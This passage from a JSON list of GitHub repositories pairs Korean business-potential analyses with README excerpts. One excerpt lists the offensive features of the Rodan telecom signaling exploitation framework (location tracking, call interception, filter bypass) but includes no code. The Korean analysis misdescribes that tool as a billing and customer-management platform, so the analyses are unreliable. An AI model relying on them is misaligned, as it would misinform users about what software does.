제공\n2","readme_excerpt":"# http-proxy-middleware\n\n[![GitHub Workflow Status (with branch)](https://img.shields.io/github/actions/workflow/status/chimurai/http-proxy-middleware/ci.yml?branch=master&logo=github-actions&logoColor=white&style=flat-square)](https://github.com/chimurai/http-proxy-middleware/actions/workflows/ci.yml?query=branch%3Amaster)\n[![Coveralls](https://img.shields.io/coveralls/chimurai/http-proxy-middleware.svg?style=flat-square&logo=coveralls)](https://coveralls.io/r/chimurai/http-proxy-middleware)\n[![Known Vulnerabilities](https://snyk.io/test/github/chimurai/http-proxy-middleware/badge.svg)](https://snyk.io/test/github/chimurai/http-proxy-middleware)\n[![npm](https://img.shields.io/npm/v/http-proxy-middleware?color=%23CC3534&style=flat-square&logo=npm)](https://www.npmjs.com/package/http-proxy-middleware)\n\nNode.js proxying made simple. Configure proxy middleware with ease for [connect](https://github.com/senchalabs/connect), [express](https://github.com/expressjs/express), [next.js](https:/","composite_score":0.118,"license_safety_tag":"safe"},{"name":"popperjs/popper-core","github_url":"https://github.com/popperjs/popper-core","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"# Popper.js Core 사업화 분석\n\n## 왜 보물인가\n웹사이트의 팝업, 드롭다운, 툴팁 같은 떠있는 요소들을 정확하게 배치해주는 핵심 기술로, 전 세계 수백만 개의 웹사이트에서 필수적으로 사용되고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 대시보드 플랫폼**: 기업 관리 도구(CRM, 분석 툴)의 UI에서 안정적인 팝업/드롭다운 기능","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/floating-ui/floating-ui/blob/master/website/assets/floating-ui-banner.png\" alt=\"Floating UI\" width=\"70%\">\n<p>\n\n> [!NOTE]\n> Popper is now Floating UI! For Popper v2, visit\n> [its dedicated branch](https://github.com/floating-ui/floating-ui/tree/v2.x) and [its documentation](https://popper.js.org/docs).\n> For help on migrating, check out the\n> [Migration Guide.](https://floating-ui.com/docs/migration)\n\n[Floating UI](https://floating-ui.com) is a small library that helps you create\n\"floating\" elements such as tooltips, popovers, dropdowns, and more.\n\nIt offers two main features:\n\n1. **Anchor positioning**: Anchor a floating element (such as a tooltip) to\n   another element (such as a button) while simultaneously ensuring it stays in\n   view as best as possible by avoiding collisions. This feature is available\n   for all platforms.\n2. **User interactions for React**: Hooks and components for composing\n   interactions to create accessible fl","composite_score":0.118,"license_safety_tag":"safe"},{"name":"deepmind/deepmind-research","github_url":"https://github.com/deepmind/deepmind-research","stars":7,"language":"Jupyter Notebook","license":"apache-2.0","abandonment_months":0,"description":"# DeepMind Research 저장소 분석\n\n## 왜 보물인가\n구글의 인공지능 연구 조직이 공개한 최신 AI 알고리즘과 논문들이 모여 있어, 미래 기술 트렌드를 가장 먼저 학습할 수 있는 자료실입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 솔루션 SaaS**: DeepMind의 게임 전략 알고리즘을 활용한 사업 최적화 도구를 기업에 구독형으로 판매","readme_excerpt":"# DeepMind Research\n\nThis repository contains implementations and illustrative code to accompany\nDeepMind publications. Along with publishing papers to accompany research\nconducted at DeepMind, we release open-source\n[environments](https://deepmind.com/research/open-source/open-source-environments/),\n[data sets](https://deepmind.com/research/open-source/open-source-datasets/),\nand [code](https://deepmind.com/research/open-source/open-source-code/) to\nenable the broader research community to engage with our work and build upon it,\nwith the ultimate goal of accelerating scientific progress to benefit society.\nFor example, you can build on our implementations of the\n[Deep Q-Network](https://github.com/deepmind/dqn) or\n[Differential Neural Computer](https://github.com/deepmind/dnc), or experiment\nin the same environments we use for our research, such as\n[DeepMind Lab](https://github.com/deepmind/lab) or\n[StarCraft II](https://github.com/deepmind/pysc2).\n\nIf you enjoy building tools, enviro","composite_score":0.118,"license_safety_tag":"safe"},{"name":"koolshare/koolshare.github.io","github_url":"https://github.com/koolshare/koolshare.github.io","stars":7,"language":"Classic ASP","license":"unknown","abandonment_months":4,"description":"# koolshare/koolshare.github.io 분석\n\n## 왜 보물인가\n공개된 웹사이트 소스코드로, 누구나 비슷한 서비스를 빠르게 만들 수 있는 기초 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **커뮤니티 포털 SaaS**: 유사한 구조의 커뮤니티 웹사이트를 여러 고객사에게 제공\n2. **라우터 펌웨어 관리 도구**: 네트워크 장비 업체들이 사","readme_excerpt":"小宝开源插件\n=========\n\n目前仅支持小宝改版本的 Merlin 固件的插件。未来有望支持 Tomato/Ddwrt 等 arm 系列路由器的插件而成为类似 Entware 可以让大家安装并且有配置界面的插件列表。目前还远远达不到我们心中的设计目标，时间有限，只能一跳一跳的去完成，希望能有更多兄弟参与。\n\n插件支持列表\n========\n* 穿透 DDNS [查看介绍](http://koolshare.cn/thread-123567-1-1.html)\n* P2P 远程文件管理 + 流媒体支持 [查看介绍](http://koolshare.cn/thread-129199-1-1.html)\n* 讯雷下载\n* Aria2 下载\n* 讯雷快鸟\n* KoolProxy 家长控制 [查看介绍](http://koolshare.cn/thread-64086-1-1.html)\n* 策略路由\n* WebShell\n* 远程消息通知\n* Alidns + ddnspod + gddns\n\n存储核心\n=======\n* Skipdbv2 [项目地址](https://github.com/koolshare/skipdbv2)\n\n开发与调试方式\n======\n* 最好在 linux 环境下进行开发\n* TODO\n\n感谢人员\n======\n* 排名不分先后\n* TODO\n\n交流场地\n======\n* 目前我们在 [Koolshare 论坛](http://koolshare.cn/forum.php)\n\n","composite_score":0.1173,"license_safety_tag":"unknown"},{"name":"trailofbits/pip-audit","github_url":"https://github.com/trailofbits/pip-audit","stars":24,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# pip-audit 상용화 분석\n\n## 왜 보물인가\n파이썬 프로젝트의 보안 취약점을 자동으로 찾아주는 도구로, 개발팀의 보안 리스크를 사전에 차단할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 SaaS 보안 검사 서비스**\n- 기업이 자신의 코드를 온라인에 업로드해 보안 문제를 자동 진단받는 구독형 서비스\n\n**2. 개발사 내부 CI/CD ","readme_excerpt":"pip-audit\n=========\n\n<!--- BADGES: START --->\n[![CI](https://github.com/pypa/pip-audit/workflows/CI/badge.svg)](https://github.com/pypa/pip-audit/actions/workflows/ci.yml)\n[![PyPI version](https://badge.fury.io/py/pip-audit.svg)](https://pypi.org/project/pip-audit)\n[![Packaging status](https://repology.org/badge/tiny-repos/python:pip-audit.svg)](https://repology.org/project/python:pip-audit/versions)\n[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/pypa/pip-audit/badge)](https://api.securityscorecards.dev/projects/github.com/pypa/pip-audit)\n[![License](https://img.shields.io/github/license/pypa/pip-audit)](https://github.com/pypa/pip-audit/blob/main/LICENSE)\n<!--- BADGES: END --->\n\n`pip-audit` is a tool for scanning Python environments for packages\nwith known vulnerabilities. It uses the Python Packaging Advisory Database\n(https://github.com/pypa/advisory-database) via the\n[PyPI JSON API](https://warehouse.pypa.io/api-reference/json.html) as a source\nof vuln","composite_score":0.117,"license_safety_tag":"safe"},{"name":"chenjiandongx/pyecharts","github_url":"https://github.com/chenjiandongx/pyecharts","stars":6,"language":"Python","license":"mit","abandonment_months":0,"description":"# pyecharts 저장소 평가\n\n## 왜 보물인가\n복잡한 데이터를 아름다운 차트와 그래프로 자동 변환해주는 도구로, 비즈니스 데이터를 직관적으로 시각화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 매출 현황, 고객 통계 등을 보여주는 대시보드 서비스\n- **내부 업무 도구**: 회사 내 마케팅팀이 월간 성과 리포트를 자동","readme_excerpt":"<p align=\"center\">\n    <img src=\"https://user-images.githubusercontent.com/19553554/71825144-2d568180-30d6-11ea-8ee0-63c849cfd934.png\" alt=\"pyecharts logo\" width=200 height=200 />\n</p>\n<h1 align=\"center\">pyecharts</h1>\n<p align=\"center\">\n    <em>Python ❤️ ECharts = pyecharts</em>\n</p>\n<p align=\"center\">\n    <a href=\"https://github.com/pyecharts/pyecharts/actions\">\n        <img src=\"https://github.com/pyecharts/pyecharts/actions/workflows/python-app.yml/badge.svg\" alt=\"Github Actions Status\">\n    </a>\n    <a href=\"https://codecov.io/gh/pyecharts/pyecharts\">\n        <img src=\"https://codecov.io/gh/pyecharts/pyecharts/branch/master/graph/badge.svg\" alt=\"Codecov\">\n    </a>\n    <a href=\"https://badge.fury.io/py/pyecharts\">\n        <img src=\"https://badge.fury.io/py/pyecharts.svg\" alt=\"Package version\">\n    </a>\n    <a href=\"https://pypi.org/project/pyecharts/\">\n        <img src=\"https://img.shields.io/pypi/pyversions/pyecharts.svg?colorB=brightgreen\" alt=\"PyPI - Python Version\">\n    </a>\n</","composite_score":0.1169,"license_safety_tag":"safe"},{"name":"pschanely/CrossHair","github_url":"https://github.com/pschanely/CrossHair","stars":36,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# CrossHair 저장소 분석\n\n## 왜 보물인가\nAI가 만든 코드가 정말 제대로 작동하는지 자동으로 검증해주는 도구로, AI 시대에 개발자들이 가장 필요로 하는 품질 보증 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 코딩 보조 서비스**: ChatGPT나 GitHub Copilot으로 생성한 코드의 오류를 자동으로 찾아내고 수정하는 웹 서","readme_excerpt":"<img src=\"doc/source/logo-gray.png\" width=\"5%\" align=\"left\">\n\n# CrossHair\n\n[![Join the chat on Discord](https://img.shields.io/discord/1346219754519789719?logo=discord&logoColor=white)](https://discord.gg/rUeTaYTWbb)\n[![Check status](https://github.com/pschanely/CrossHair/actions/workflows/check.yml/badge.svg?branch=main&event=push)](https://github.com/pschanely/CrossHair/actions?query=workflow%3ACheck+event%3Apush)\n[![Downloads](https://static.pepy.tech/badge/crosshair-tool/week)](https://pepy.tech/project/crosshair-tool)\n\nAn analysis tool for Python that blurs the line between testing and\ntype systems.\n\n> **_THE LATEST NEWS:_**\nPython's most popular property-based testing tool,\n[Hypothesis](https://hypothesis.readthedocs.io/en/latest/),\nnow supports running CrossHair as an\n[optional backend](https://hypothesis.readthedocs.io/en/latest/strategies.html#alternative-backends)!\n\n\nIf you have a function with\n[type annotations](https://www.python.org/dev/peps/pep-0484/) and add a\ncontract\n[","composite_score":0.1168,"license_safety_tag":"unknown"},{"name":"BlackHC/BatchBALD","github_url":"https://github.com/BlackHC/BatchBALD","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":1,"description":"# BatchBALD 저장소 분석\n\n## 왜 보물인가\n적은 데이터로도 AI 모델을 똑똑하게 학습시킬 수 있는 기술로, 데이터 수집 비용이 많이 드는 기업들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 영상 진단 SaaS**: 의사가 라벨을 붙여야 할 X-ray 이미지를 최소한으로 선택하는 서비스로, 의료 데이터 라벨링 비용을 50% 이상","readme_excerpt":"# BatchBALD\n\n**Note:** A more modular re-implementation can be found at https://github.com/BlackHC/batchbald_redux.\n\n---\n\nThis is the code drop for our paper \n[BatchBALD: Efficient and Diverse Batch Acquisition for Deep Bayesian Active Learning](https://arxiv.org/abs/1906.08158).\n\nThe code comes as is.\n\nSee https://github.com/BlackHC/batchbald_redux and https://blackhc.github.io/batchbald_redux/ for a reimplementation.\n\nElementAI's Baal framework also supports BatchBALD: https://github.com/ElementAI/baal/. \n\nPlease cite us:\n\n```\n@misc{kirsch2019batchbald,\n    title={BatchBALD: Efficient and Diverse Batch Acquisition for Deep Bayesian Active Learning},\n    author={Andreas Kirsch and Joost van Amersfoort and Yarin Gal},\n    year={2019},\n    eprint={1906.08158},\n    archivePrefix={arXiv},\n    primaryClass={cs.LG}\n}\n```\n\n## How to run it\n\nMake sure you install all requirements using\n\n```\nconda install pytorch torchvision cudatoolkit=10.0 -c pytorch\npip install -r requirements.txt\n```\n\nand ","composite_score":0.1166,"license_safety_tag":"restricted"},{"name":"sdl60660/river-runner","github_url":"https://github.com/sdl60660/river-runner","stars":11,"language":"Svelte","license":"GPL-3.0","abandonment_months":6,"description":"# River Runner - 보물 분석 보고서\n\n## 왜 보물인가\n강의 흐름을 시각화하고 분석하는 도구로, 지리학자, 환경 연구자, 관광업체가 수로 데이터를 쉽게 다룰 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 환경 컨설팅 SaaS**\n- 댐 건설 업체나 환경부가 구독하여 강 유역 분석 및 생태계 영향 평가 자동화\n\n**2. 관광 앱 내부 ","readme_excerpt":"# River Runner\n\nThis project visualizes the path of a rain droplet from any point in the world to its end point (usually an ocean or an inland water features). It will find the closest river/stream flowline coordinate to a click/search and then animate along that flowline's downstream path. The data used in this project comes from the [River Runner API](https://ksonda.github.io/global-river-runner/), which is based on several open source projects and datasets. Similar data, initially used for the project, came from the USGS's [NHDPlus data](https://www.usgs.gov/core-science-systems/ngp/national-hydrography/nhdplus-high-resolution) and their [NLDI API](https://waterdata.usgs.gov/blog/nldi-intro/) \n\nI've used mapbox to animate the downstream path, but needed to make all sorts of adjustments for elevation and bearing changes to prevent jerkiness/nausea (just moving from point to point feels a little like flying through turbulence while shaking your head side-to-side).\n\nI've hosted a datas","composite_score":0.1166,"license_safety_tag":"restricted"},{"name":"Predictly-MCP-Labs/polymarket-btc-5min-15min-arbitrage-bot","github_url":"https://github.com/Predictly-MCP-Labs/polymarket-btc-5min-15min-arbitrage-bot","stars":210,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1162,"license_safety_tag":"unknown"},{"name":"doctrine/annotations","github_url":"https://github.com/doctrine/annotations","stars":5,"language":"PHP","license":"mit","abandonment_months":6,"description":"# Doctrine Annotations 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 소프트웨어에 \"주석\"을 달아서 자동으로 기능을 활성화할 수 있게 해주는 핵심 도구로, 복잡한 웹 서비스 개발을 훨씬 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. API 자동 문서화 SaaS**\n개발자들이 작성한 주석을 자동으로 읽어서 API 사용 설명서를","readme_excerpt":"⚠️ PHP 8 introduced\n[attributes](https://www.php.net/manual/en/language.attributes.overview.php),\nwhich are a native replacement for annotations. As such, this library is\nconsidered feature complete, and should receive exclusively bugfixes and\nsecurity fixes.\n\nWe do not recommend using this library in new projects and encourage authors\nof downstream libraries to offer support for attributes as an alternative to\nDoctrine Annotations.\n\nHave a look at [our blog](https://www.doctrine-project.org/2022/11/04/annotations-to-attributes.html)\nto learn more.\n\n# Doctrine Annotations\n\n[![Build Status](https://github.com/doctrine/annotations/workflows/Continuous%20Integration/badge.svg?label=build)](https://github.com/doctrine/persistence/actions)\n[![Dependency Status](https://www.versioneye.com/package/php--doctrine--annotations/badge.png)](https://www.versioneye.com/package/php--doctrine--annotations)\n[![Reference Status](https://www.versioneye.com/php/doctrine:annotations/reference_badge.svg)](h","composite_score":0.1162,"license_safety_tag":"safe"},{"name":"siimon/prom-client","github_url":"https://github.com/siimon/prom-client","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":5,"description":"# prom-client 저장소 분석\n\n## 왜 보물인가\n웹서비스의 건강 상태를 자동으로 감시하고 문제를 미리 알려주는 핵심 모니터링 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독형 클라우드 서비스가 언제 느려지는지 실시간으로 감지하여 고객만족도 향상\n- **내부 업무 도구**: 회사 내부 시스템의 성능을 자동으로 추적하여 IT팀","readme_excerpt":"# Prometheus client for node.js [![Actions Status](https://github.com/siimon/prom-client/workflows/Node.js%20CI/badge.svg?branch=master)](https://github.com/siimon/prom-client/actions)\n\nA prometheus client for Node.js that supports histogram, summaries, gauges and\ncounters.\n\n## Usage\n\nSee example folder for a sample usage. The library does not bundle any web\nframework. To expose the metrics, respond to Prometheus's scrape requests with\nthe result of `await registry.metrics()`.\n\n### Usage with Node.js's `cluster` module\n\nNode.js's `cluster` module spawns multiple processes and hands off socket\nconnections to those workers. Returning metrics from a worker's local registry\nwill only reveal that individual worker's metrics, which is generally\nundesirable. To solve this, you can aggregate all of the workers' metrics in the\nmaster process. See `example/cluster.js` for an example.\n\nDefault metrics use sensible aggregation methods. (Note, however, that the event\nloop lag mean and percentiles a","composite_score":0.1161,"license_safety_tag":"safe"},{"name":"QISKit/qiskit-sdk-py","github_url":"https://github.com/QISKit/qiskit-sdk-py","stars":8,"language":"Python","license":"apache-2.0","abandonment_months":0,"description":"# QISKit/qiskit-sdk-py 분석 보고서\n\n## 왜 보물인가\nIBM이 만든 양자컴퓨터를 누구나 쉽게 프로그래밍할 수 있게 해주는 도구로, 미래 기술의 진입장벽을 낮추는 핵심 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **양자컴퓨팅 학습 플랫폼 SaaS**: 대학생과 개발자가 웹브라우저에서 직접 양자컴퓨터를 체험하는 구독 교육 서비스\n2. **","readme_excerpt":"# Qiskit\n\n[![License](https://img.shields.io/github/license/Qiskit/qiskit.svg?)](https://opensource.org/licenses/Apache-2.0) <!--- long-description-skip-begin -->\n[![Current Release](https://img.shields.io/github/release/Qiskit/qiskit.svg?logo=Qiskit)](https://github.com/Qiskit/qiskit/releases)\n[![Extended Support Release](https://img.shields.io/github/v/release/Qiskit/qiskit?sort=semver&filter=1.*&logo=Qiskit&label=extended%20support)](https://github.com/Qiskit/qiskit/releases?q=tag%3A1)\n[![Downloads](https://img.shields.io/pypi/dm/qiskit.svg)](https://pypi.org/project/qiskit/)\n[![Coverage Status](https://coveralls.io/repos/github/Qiskit/qiskit/badge.svg?branch=main)](https://coveralls.io/github/Qiskit/qiskit?branch=main)\n![PyPI - Python Version](https://img.shields.io/pypi/pyversions/qiskit)\n[![Minimum rustc 1.87](https://img.shields.io/badge/rustc-1.87+-blue.svg)](https://rust-lang.github.io/rfcs/2495-min-rust-version.html)\n[![Downloads](https://static.pepy.tech/badge/qiskit)](https","composite_score":0.1158,"license_safety_tag":"safe"},{"name":"OfficeDev/office-ui-fabric-react","github_url":"https://github.com/OfficeDev/office-ui-fabric-react","stars":9,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# Office UI Fabric React 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 전문적인 업무용 소프트웨어 디자인 도구 모음으로, 기업 애플리케이션을 빠르게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 SaaS**: 회계 관리, 인사관리, 재무분석 등 업무용 웹 애플리케이션 구축\n2. **내부 업무 도구**: 대기업의 직원","readme_excerpt":"# Fluent UI Web\n\n[![Build Status](https://img.shields.io/azure-devops/build/uifabric/fabricpublic/164/master?style=flat-square)](https://dev.azure.com/uifabric/fabricpublic/_build?definitionId=164) ![GitHub contributors](https://img.shields.io/github/contributors/microsoft/fluentui?style=flat-square) ![GitHub top language](https://img.shields.io/github/languages/top/microsoft/fluentui?style=flat-square) [![Twitter Follow](https://img.shields.io/twitter/follow/fluentui?logo=x&style=flat-square)](https://twitter.com/FluentUI?ref_src=twsrc%5Etfw)\n\n> Fluent UI React is shipping its v9 final stable release. Visit the [Fluent UI React v9 Release page on the wiki](https://github.com/microsoft/fluentui/wiki/Fluent-UI-React-v9-Release) to learn more about the upcoming release schedule.\n\nFluent UI web represents a collection of utilities, React components, and Web Components for building web applications.\n\nThis repo is home to 3 separate projects today. Combining Fluent UI React v9 components wi","composite_score":0.1158,"license_safety_tag":"unknown"},{"name":"xwiki-labs/cryptpad","github_url":"https://github.com/xwiki-labs/cryptpad","stars":6,"language":"JavaScript","license":"agpl-3.0","abandonment_months":0,"description":"# CryptPad 분석 보고서\n\n## 왜 보물인가\n누구나 안전하게 문서를 작성하고 공유할 수 있는 암호화된 협업 도구로, 개인정보 보호가 중요한 시대에 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 문서 협업 플랫폼으로 구독료 모델 운영 (Microsoft 365 경쟁)\n- **내부 업무 도구**: 민감한 정보를 다루는","readme_excerpt":"<!--\nSPDX-FileCopyrightText: 2023 XWiki CryptPad Team <contact@cryptpad.org> and contributors\n\nSPDX-License-Identifier: AGPL-3.0-or-later\n-->\n\n# CryptPad\n\nCryptPad is a collaboration suite that is end-to-end encrypted and open-source. It is designed to facilitate collaboration by synchronizing changes to documents in real time. Since all the user data is encrypted, in the event of a breach, attackers have no way of accessing the stored content. Furthermore, if the administrators do not modify the code, they and the service also cannot access any information about the users' content.\n\n![Drive screenshot](screenshot.png \"preview of the CryptDrive\")\n\n![Suite screenshots](screenshot-suite.png \"all CyptPad applications: Document, Sheet, Presentation, Form, Kanban, Code, Rich Text, Whiteboard\")\n\n# Installation\n\n## For development\n\nOur [developer guide](https://docs.cryptpad.org/en/dev_guide/setup.html) provides instructions for setting up a local instance without HTTPS or our more advanced s","composite_score":0.1157,"license_safety_tag":"risky"},{"name":"SoftEtherVPN/SoftEtherVPN","github_url":"https://github.com/SoftEtherVPN/SoftEtherVPN","stars":5,"language":"C","license":"Apache-2.0","abandonment_months":1,"description":"# SoftEtherVPN 상용화 분석\n\n## 왜 보물인가\n누구나 안전하게 인터넷을 사용할 수 있도록 도와주는 무료 보안 기술로, 기업과 개인 모두에게 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업용 클라우드 VPN 구독 서비스로 월 구독료를 받고 관리형 보안 접속 제공\n2. **내부 업무 도구**: 대기업의 직원","readme_excerpt":"# SoftEther VPN\r\n\r\n||Badges|\r\n|---|---|\r\n|GitLab CI|[![GitLab CI build status](https://gitlab.com/SoftEther/SoftEtherVPN/badges/master/pipeline.svg)](https://gitlab.com/SoftEther/SoftEtherVPN/pipelines)|\r\n|Coverity Scan|[![Coverity Scan build status](https://scan.coverity.com/projects/16304/badge.svg)](https://scan.coverity.com/projects/softethervpn-softethervpn)|\r\n|Cirrus CI|[![Cirrus CI build status](https://api.cirrus-ci.com/github/SoftEtherVPN/SoftEtherVPN.svg)](https://cirrus-ci.com/github/SoftEtherVPN/SoftEtherVPN)|\r\n\r\n- [SoftEther VPN](#softether-vpn)\r\n- [BOARD MEMBERS OF THIS REPOSITORY](#board-members-of-this-repository)\r\n- [SOFTETHER VPN ADVANTAGES](#softether-vpn-advantages)\r\n- [Installation](#installation)\r\n  * [For FreeBSD](#for-freebsd)\r\n  * [For Windows](#for-windows)\r\n  * [From binary installers (stable channel)](#from-binary-installers-stable-channel)\r\n  * [Build from Source code](#build-from-source-code)\r\n- [Antivirus False Positive Detection](ANTIVIRUS.md)\r\n- [About ","composite_score":0.1155,"license_safety_tag":"safe"},{"name":"daangn/digital-garden","github_url":"https://github.com/daangn/digital-garden","stars":15,"language":"","license":"MIT","abandonment_months":3,"description":"# daangn/digital-garden 상품화 분석\n\n## 왜 보물인가\n개인의 생각과 지식을 체계적으로 정리하고 연결하는 '디지털 정원' 개념을 누구나 쉽게 사용할 수 있는 도구로 만들어, 노션이나 옵시디언 같은 복잡한 도구의 대안이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개인 지식 관리 플랫폼으로, 사용자가 생각을","readme_excerpt":"# digital-garden\n\n당근마켓 공개 지식 농장 (*디지털 가드닝*)\n\n## [[Digital Gardening]]은 뭔가요?\n\n참고:\n\n- [A Brief History & Ethos of the Digital Garden](https://maggieappleton.com/garden-history)\n- [Digital garden - My second-brain](https://garden.anthonyamar.fr/Digital+garden/Digital+garden)\n\n## 어떻게 사용하나요?\n\n[[Roam Research]] 스타일의 문서 링크를 지원하는 도구를 사용해요.\n\n- [Roam Research](https://roamresearch.com/)\n- [Obsidian](https://obsidian.md/)\n- [Foam](https://foambubble.github.io/)\n\n## 저작 기여 가이드\n\nSee [CONTRIBUTING.md](./CONTRIBUTING.md)\n\n## Disclaimer\n\n이 저장소는 모두에게 도움이 되는 공공의 지식만 아카이빙하며 당근마켓 내부사항을 다루지 않습니다.\n\n예를 들면 온보딩, 내부 시스템 가이드 등 내부사항은 사내 위키에 작성해주세요.\n\n## LICENSE\n\n[[MIT (License)]]\n","composite_score":0.1153,"license_safety_tag":"safe"},{"name":"Etisalat-Egypt/Rodan","github_url":"https://github.com/Etisalat-Egypt/Rodan","stars":11,"language":"Java","license":"AGPL-3.0","abandonment_months":6,"description":"# Rodan 저장소 분석\n\n## 왜 보물인가\n이집트 통신사 에티살랏의 공식 프로젝트로, 중동 지역의 대규모 통신 인프라 운영에 실제로 사용되는 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **통신사 관리 플랫폼**: 통신 회사의 고객 계정, 요금, 서비스 관리 시스템으로 SaaS 제공\n2. **내부 업무 도구**: 대규모 조직의 자산 관리, 청구 ","readme_excerpt":"\n# Rodan Telecom Signaling Exploitation Framework\n\n### Disclaimer\nRodan is provided for security testing and educational use on systems you own or are authorised to assess. Any misuse is your sole responsibility. Illegal use may lead to criminal charges. The authors and Etisalat Egypt accept no liability for actions performed with this framework.\n\n## Authors\n* [Ayman ElSherif][ayman]\n\n## 1. Introduction\nRodan is a telecom signaling exploitation framework created and maintained by \n[Etisalat Egypt][et] Research Labs (E-Labs). This framework includes a suite of \nmodules that enable users to exploit vulnerabilities in the signaling protocols \nused by mobile operators.<br/><br/>\nRodan currently supports SS7 and Diameter protocols with plans to support GTP and SIP.\n\n## 2. Features\n\n* Network and Subscriber Information Disclosure.\n* Location Tracking.\n* Call and SMS Interception.\n* Fraud.\n* GT/Host Brute Forcing.\n* Advanced Filtering Bypass:\n  * Malformed ACN.\n  * Global OpCodes.\n  * Double ","composite_score":0.1152,"license_safety_tag":"risky"},{"name":"emcrisostomo/fswatch","github_url":"https://github.com/emcrisostomo/fswatch","stars":7,"language":"C++","license":"GPL-3.0","abandonment_months":0,"description":"# fswatch 프로젝트 분석\n\n## 왜 보물인가\n파일이 변경될 때 자동으로 감지해서 알려주는 도구로, 개발자가 반복적인 작업을 자동화할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 환경 자동화 SaaS**: 코드 수정 시 자동으로 테스트를 실행하고 결과를 보여주는 웹 서비스\n2. **파일 동기화 솔루션**: 특정 폴더의 파일이 바뀌면 자","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://emcrisostomo.github.io/fswatch/\">\n    <img src=\"https://emcrisostomo.github.io/fswatch/images/fswatch-logo.svg\" alt=\"fswatch logo\" width=\"128\">\n  </a>\n</p>\n\n[![License](https://img.shields.io/badge/license-GPL--3.0-blue.svg?style=flat)](https://github.com/emcrisostomo/fswatch/blob/master/COPYING)\n[![C/C++ CI](https://github.com/emcrisostomo/fswatch/actions/workflows/c-cpp.yml/badge.svg)](https://github.com/emcrisostomo/fswatch/actions/workflows/c-cpp.yml)\n[![CMake](https://github.com/emcrisostomo/fswatch/actions/workflows/cmake.yml/badge.svg)](https://github.com/emcrisostomo/fswatch/actions/workflows/cmake.yml)\n\nREADME\n======\n\n`fswatch` is a file change monitor that receives notifications when the contents\nof the specified files or directories are modified.  `fswatch` implements\nseveral monitors:\n\n  * A monitor based on the _File System Events API_ of Apple macOS.\n  * A monitor based on _kqueue_, a notification interface introduced in FreeBSD\n    4","composite_score":0.1152,"license_safety_tag":"restricted"},{"name":"lcomplete/TechShare","github_url":"https://github.com/lcomplete/TechShare","stars":14,"language":"Vue","license":"GPL-3.0","abandonment_months":2,"description":"# TechShare 상용화 분석 보고서\n\n## 왜 보물인가\n개발자들이 기술 지식을 쉽게 공유하고 배울 수 있는 플랫폼으로, 온라인 교육 시장의 성장과 함께 수요가 증가할 가능성이 높습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 기술 학습 구독 플랫폼**\n개발자와 비개발자가 기술 개념을 배우는 웹/앱 서비스로 월 구독료를 받습니다.\n\n**","readme_excerpt":"# lcomplete 的技术分享\n\n> 分享使你我都受益，何乐而不为也。但伏尔泰说过，图书馆是真理和谬误的宝库，所以仅是希望对你有益，若有谬误还望指出以更正。\n\n- 🐦 我的 Twitter，分享效率方法 🪄、优质文章 📑、编程知识 🎹、实用工具 🛠️：[lcomplete](https://twitter.com/lcomplete_wild)\n- 📧 我的 Newsletter，点击这里订阅：[野生架构师](https://coolc.substack.com/)\n- 📘 我收藏的文章，可从中发现优质内容：[Favorites / Raindrop.io](https://raindrop.io/lcomplete/favorites-23073692)\n\n<!-- ## Hello World\n\n> 打开计算机编程这扇大门。\n\n* [计算机编程：自底向上方法](docs/world/自底向上方法.md)  -->\n\n## 野生架构师周刊\n\n- [001 🐣 低代码、我的信息管理](docs/letter/001.md)\n- [002 🕷 Web 3.0、关于好品味的商业模式](docs/letter/002.md)\n- [003 🐂 新一代 kubernetes、反脆弱](docs/letter/003.md)\n- [004 🧛‍♂ 备受程序员喜爱的暗黑主题、程序员的英语有多重要、Newsletter 资源分享](docs/letter/004.md)\n- [005 ⚙️ IFTTT 和 Zapier 使用对比、最好的效率系统、投入产出比最高的 3 件事](docs/letter/005.md)\n- [006 📒 与人保持联系的系统、用低代码应用设计产品原型、万能锤](docs/letter/006.md)\n- [007 🍀 十年后重新使用 RSS 给我带来的巨变](docs/letter/007.md)\n- [008 📚 Notion vs Obsidian、程序设计 vs 软件工程](docs/letter/008.md)\n- [009 🌈 Newsletter Of Newsletters、海绵宝宝的智慧](docs/letter/009.md)\n- [010 🚀 Hacking The Mind / 拆掉思维里的墙、放飞想象、打破规则](docs/l","composite_score":0.115,"license_safety_tag":"restricted"},{"name":"ryanhaining/cppitertools","github_url":"https://github.com/ryanhaining/cppitertools","stars":8,"language":"C++","license":"bsd-2-clause","abandonment_months":6,"description":"# cppitertools 분석 보고서\n\n## 왜 보물인가\nC++ 프로그래밍 언어에서 반복 작업을 간단하게 만들어주는 도구 모음으로, 복잡한 데이터 처리 코드를 더 읽기 쉽고 짧게 작성할 